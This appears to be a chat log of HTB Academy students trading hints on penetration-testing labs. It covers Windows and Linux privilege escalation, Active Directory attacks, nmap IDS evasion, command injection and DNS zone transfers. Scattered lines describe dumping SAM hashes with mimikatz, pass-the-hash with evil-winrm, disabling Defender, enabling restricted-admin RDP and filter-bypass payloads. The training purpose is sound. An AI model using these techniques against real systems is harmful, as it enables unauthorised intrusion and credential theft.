Hello, for "Windows Privilege Escalation > Windows Privilege Escalation Skills Assessment - Part I", to get privesc I try JuicyPotato.exe via Metasploit but I have the error "COM -> recv failed with error: 10038". Do you know this problem? With PrintSpoofer64.exe, the problem is "Operation failed or timed out.". Any tips?
hey, can someone help me with the Firewall and IDS/IPS Evasion - Medium Lab in the NETWORK ENUMERATION WITH NMAP module
sudo nmap target ip -sU -p 53 -Pn --script=dns-nsid
i tried this command, but I am only getting output like:
Host is up.
PORT STATE SERVICE
53/tcp filtered domain
I ran your script and it worked on mine, maybe reset your target.
yeah bro
thanks bro it worked
You have to try different methods until one sticks. The machine appears secured against most methods taught in the module, but not all.
do you mean other methods for SeImpersonatePrivilege privesc?
I mean throw spaghetti at the wall and see what sticks.
I pay for HTB Academy for a month. Could I access the modules that I completed?
yes
I am new to htb and the whole scene of cybersec. Is it recommended that I complete all the fundamental modules provided before moving on? Or do you recommend something else? Thanks.
guys
my issue got solved
first I was having tun0 and tun1 configurations, and then I only had the tun0 configuration, so the VPN worked and I was able to ping the target machine
i just wanted to convey this so that it might help others as well, and it would be a form of documentation and whatsoever, so pls don't mind
guys I had one more doubt: is it fine to use Tor and proxychains together to stay anonymous, or is it necessary to use a VPN? Like, is a VPN more reliable, or proxychains + Tor?
pls do tell
Use TryHackMe first, then HTB (I did the same)
If you ask why
HTB is a little bit more advanced
Not so much, but I recommend having an understanding of everything in THM so HTB will be easier
Good advice
Just do the Pre Security path and come to Academy, finish the Information Security Foundations skill path, then start CPTS or CDSA, whatever you like
Guys, you know when base64 encoding bash commands for the Command Injections module.
Is it necessary to URL encode / within that base64 string too?
Or is the base64 enough to bypass the filter for /?
The skills assessment is taking my soul
You don't need to URL encode the base64 string iirc
I threw about 5000 things at it before becoming systematic. I have commands running now so hopefully can sort this quickly from here
As you said, without b64
Got it
That was awesome but painful
there were a few ways you could get the flag for that skill assessment, you chose the hard way
I think I did it the easy way in the end. Just I was sorta trying for the whole command at once instead of getting it working bit by bit
hello, just a question that has been intriguing me. In the nmap module it says that for IPS/IDS evasion we sometimes have to specify a spoofed IP (-S) that is in the same subnet as the server for us to actually get a response back from the specified port. However, how does the server know how to route the traffic back to us if we spoof our IP and are on different subnets?
Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got system on SQL01 and got the local admin hash so I can WINRM into SQL01 now. Used LaZagne, mimikatz, secretsdump, and manual search for things. I also have the creds of ms******. I have 2 users (AB*** and BR***) that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated. I’ve been doing these skills assessments for what feels like weeks now. Been reading and trying things and not having success
What privileges does the current user you are logged in as have?
@half stag so you already have the flag off SQL01, then the way to get to MS01 is in BloodHound and user rights
i used BloodHound, didn't find anything interesting
the nothing 'interesting' may be interesting after all.
i should look for rights the user SQL01 has?
Honestly i got to MS01 first and had to backtrack to SQL01
I would take a look at what users/credentials (hashes) you may already have that have access to things.
what do you get from outbound control rights in BH?
Did you dump the SAM files?
no
Try that, you're probably gonna find something juicy there
dump it using mimikatz?
You got system level on SQL01, you should be able to access the sam, system, security files
Or just try to secretsdump directly, it may work; I personally dumped the SAM manually
any1?
(i ran BloodHound on the user sql01) even when setting it as the starting node I don't see the outbound control rights in node info
Thnx, I will try
the problem was about a wrong CLSID. Thx for your help 😉
Can anyone help me with "During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer." in the "Rapid Triage Examination & Analysis Tools" module please? I've seen a couple hints in here but im still not getting it. I can see the Zone Identifier entry in mft.csv and can see in MFT-J.csv that it has been renamed but i cant find out the new name
Got the SAM file, it has the hash for the local administrator, what could I do with it?
i also tried PTH for the 172.16.7.50
does it work? if it doesn't, try out the other hashes
make sure you're running it against the whole subnet /24
nothing worked 😢
how did you get the hashes?
lsadump::sam
It should work, what did you use to pass the hash
RDP won't work btw
evil-winrm
iirc administrator hash is not the way.
It worked for me 🫨
from my notes, i got the admin hash and pth via evil-winrm
Then disabled that rdp restriction and logged in via rdp :v
Dm me the hash you found
you just need to add the DisableRestrictedAdmin reg key with WinRM before using RDP.
Yes that’s what should be done
But about that MS01 administrator idk, I got his hash from the SAM files, but iirc others said mimikatz works
Was my hash correct?
[ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
any ideas?
try it with /cert:ignore
Didn't work. Solved with /tls-seclevel:0 /timeout:80000. Long live google!
Anyone knows why I can’t chat in general
About sqlmap, is there a way to know what type of SQLi it is before running the cmd xd? I mean, they are not going to tell us during the CBBH exam, so will we have to test everything one by one, or is there something to try to find the type and use the correct format with sqlmap?
hello guys, regarding the nmap module: IDS/IPS evasion lab 1 (easy)
I'm using this command: sudo nmap 10.129.2.28 -n -Pn -p445 -O -S 10.129.2.155 -e tun0, as it is the most relevant one based on the hint.
However nmap is throwing an error that there is no route to the host.
Is it a bug? Because in the module this command worked. Or am I completely on the wrong track?
Did you start your VPN from HTB Academy?
Does anyone know what we're supposed to do in the Authentication Bypass section of Whitebox Attacks did they just use some completely different hash in the target vs the provided code?
yes, I'm connected and can scan it perfectly
however I have to bypass the firewall so it gives me the OS info, and the -S spoofed-ip -e tun0 is throwing an error; others faced the same issue
am I on the right track?
PIVOTING, TUNNELING, AND PORT FORWARDING
Issues with SocksOverRDP
On the host, I am trying to run the SocksOverRDP-Plugin.dll with the command given.
I am hitting an error telling me that the socks... file contains a virus or a program not wanted -
This is the file directly from the link provided in the module.
Can someone assist with this please?
do you mean outbound object control?
please help i am still stuck
Disable Defender if it is on
It's not just defender, it's real-time protection
Can anyone from HTB give a hint about the weekly streaks? I'm at 18 but I want to let it die... But I'd be saddened if HTB rolls something out soon after that rewards something.
It's Academy related, but I don't see a good channel, so I'm dropping it here for now
ATM there's no tangible reward for streaks
Just shiny badges
yup, but they keep hinting at that for a while now
Yeah, and they hinted at the cwee cert for like 6 months. It's likely they're deliberating on what the reward(s) should be
It's likely they're gathering some base analytical data before moving forward with implementing anything
My main thing is, I don't really have the time to do 3 sections every week, so I gotta burn some stuff every once in a while
You don't gotta do 3 sections every week
("properly do 3 sections, or 2 sections")
Answering a question counts as 1, and clicking the "complete and next" counts as 1
i wish the extra stuff you did carried over to the weeks ahead
Unless they very recently changed it
yup, but if I don't have time to answer a question, I gotta find 3 complete and next 😭
haha, thanks for answering Marcie. It's been a while
Yes
Perfect answer
Thanks @fathom pendant for add-on
if someone knows:
It's just fuck around and find out
I am currently stuck on the skills assessment of Injection Attacks, I found ||the internal service and the source code of the internal PHP, but I'm not getting further now with the XPathi; as far as I can see with my query 1+and+count(/*)=1 there is only the orders node, and I have found no other orders except 1,2,3,4,5,6 & 1337, which don't seem to help too much. What obvious issue am I missing here? ||
if i understand correctly
this is an entirely different password than the one used 3 or so modules ago
nvm got it
It's not 
realized that, I think that guy from yesterday threw me off
oh yeah duh
Yay 😭
how would you go about getting the VHD for this situation
i haven't attempted anything in this section yet, I'm just curious because isn't messing with local VHDs like admin only and such
what WOULD be the point of breaking BL if you are already ADMIN
Hey everyone, I am doing the Linux privilege assessment - skills assessment. I am on flag 4, I think I've found the user ||tomcatadm|| but I cannot for the life of me find a password
could anyone please help?
guys please help, am crying
been 3 hours on this and still can't figure this out
so the question is the last one from the INFORMATION GATHERING - WEB EDITION module in the Active Subdomain Enumeration section
Submit the number of all "A" records from all zones as the answer.
Hint: There are several zones.
You extract it from somewhere
You basically just transfer it from the victim to your system
it can be found in a backup share, or the permissions isn't configured properly and you can read it
So how many zones have you found that you can use axfr on it?
so I did find creds but they don't work
i submitted every possible number but still wrong
What have you submitted?
In a prev question you already answered how many zones are on the nameserver. Now you just need to count all A ones.
can i send the result ?
What was the range of numbers you tried already?
i got 19
i used dig axfr
Yea that's a bit short of the correct number. I sadly am in a car and can't access my notes atm.
Is 19 only from one zone?
am having a problem understanding what zones are
there's another zone you can transfer to
maybe look within
i found this and tried all solutions
it's a combination of the base zone + another zone
like main domain and sub domain ?
yes
ohhhh
so from inlanefreight.htb AND another one you can transfer to
hint localhost might show domains you can use
performing the subdomain brute forcing would help
no need to bruteforce
just axfr ?
can i send an image of the result
nope
You already answered a question above that there exists more than one zone. And the current question is asking how many A records are in all the zones you can access.
also if it's not obvious replace "subdomain" with the actual valid domain you can transfer to
which you know about because you found the text records for it
if that's the only question you haven't answered
answered all
yes
i got this ... is it related ?
you're likely heavily overthinking it
Yes but deleted it as it containst the answer
my brother in christ: what subdomain did you query to get the txt record
that will answer how you find the A records for all zones
you add the 2 together
You just manually count them how many A are there in both zones
x A records from inlanefreight.htb, and y A records from <subdomain>.inlanefreight.htb
you can also use some nice command line stuff to just do it for you
x + y ?
wc 🙏
x being the number of A records of one zone, y being the number of A records of the other
add them together and boom
there's your answer
who has the time for that if you can manually count and still miscount like I did
off by one error
You said in the first zone you counted 19 A records (don't know if it's correct since I can't access my notes), now you count the A records in the other zone
And you put 19 + the other
yes
math 🤮
i hate networking
it's funny that I am required to understand a field that got developed by thousands of minds
i mean understanding networking is a huge part of pentesting a networked environment
and it's not like you have to master it
just understand the underlying concepts
when is the day that we will let LLMs do the pentest for us
if you don't like networking, you'll really dislike AD enum and attacks
lol never, LLMs don't know shit
AD is hot
networking is a huge part of AD enum and attacks
and in the pivoting module
if you don't understand networking then it's not gonna be fun trying to understand why you can't just go from A -> C without B
Why is nothing working 
Devin.....
?
Lol fk devin
devin ai
bro if you're trying to learn this and you want an LLM to just do it for you; then there's no point in learning it imo
this is just the beginning
the exam is gonna be brutal on you if you don't understand the concepts
makes sense 
heard it's worse than OSCP
everything on the exam is taught in the course
that's its other upside, cheaper course and exam but better quality
that's on the app.hackthebox.com side
the subs are separate on each site
Or a student for 2 months
i think its 14 on app ?
Yea so it's 8€ per month?
yeah
yep
That together is 16
8 not 18
Oh what?
check plans
Ah silver
Yea ppl usually don't buy silver for CPTS
I would have gone 2x plat if I didn't have student nail
And have left over cubes for different modules that would interest you
that discount is relative to the raw cube cost
for the same amount of cubes
For the A records?
yeah
How many have you found?
when the machine IP time is over, the SSH'd terminal tab becomes unusable. Is there any command to overcome this without closing that terminal tab?
Ctrl + C ?
are you accidentally counting the SOA record and other non-A records?
nah it doesn't take any input
nah just the ones with A
type exit and hit enter
Like it got stuck? Can't type anything? I usually then just go to another terminal and close the connection with ps aux, close ssh connection
there is only 2 SOA
yes yes
yes, but i'm saying you likely miscounted
Where would the default locations be? These are normally vm files right? How would you do a normal system
.vhd is just virtual hard drive
~.<enter> in that order
ok I thought it was only happening to me
Try that from marcieLee if it works. But yea I usually just close the connection from another terminal
i tried the answer from 17 to 23
i can't miscount that
they can be a vm file, or they can just be a partitioned record
thx u all
If you said there are 19 records in the first zone (again not sure if you counted correctly), how did you come to 17 now with 2 zones?
that range is wrong
the number, i will say, is greater
Hmm so from what I read, basically exit and ctrl+D do the same? I'm pretty sure my SSH connection was unresponsive and ctrl C and not even ctrl D did the trick
203 is definitely wrong
Lol 203
nah enter then ~.
Ok will try once it hangs again. Learning something new every day. Ty